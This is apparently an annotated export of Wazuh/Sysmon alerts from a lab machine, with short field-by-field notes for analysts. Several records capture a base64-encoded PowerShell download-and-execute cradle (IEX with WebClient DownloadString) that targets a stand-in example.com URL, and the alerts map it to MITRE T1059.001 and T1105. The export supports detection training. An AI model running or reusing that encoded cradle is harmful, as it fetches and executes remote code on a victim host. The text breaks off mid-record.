rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 93 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534388.1892344 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:45.8395470Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:44.666
ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ProcessId: 4736
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ParentProcessId: 4284
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:44.666 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 97 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534388.1900407 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:46.0684203Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285470 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:46.062
ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ProcessId: 4736
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_epfzzdna.g5t.ps1
CreationUtcTime: 2025-04-24 22:39:46.062
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:46.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_epfzzdna.g5t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:46.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 94 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534391.1903172 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:48.4763635Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285495 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:47.286
ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ProcessId: 10488
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ParentProcessId: 4736
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:47.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 98 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534391.1911239 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:48.7171585Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285496 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:48.710
ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ProcessId: 10488
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pn3p00ne.adg.ps1
CreationUtcTime: 2025-04-24 22:39:48.710
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:48.710 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pn3p00ne.adg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:48.710 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 95 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534392.1914008 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:50.5947163Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285521 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:49.622
ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ProcessId: 4872
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ParentProcessId: 10488
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
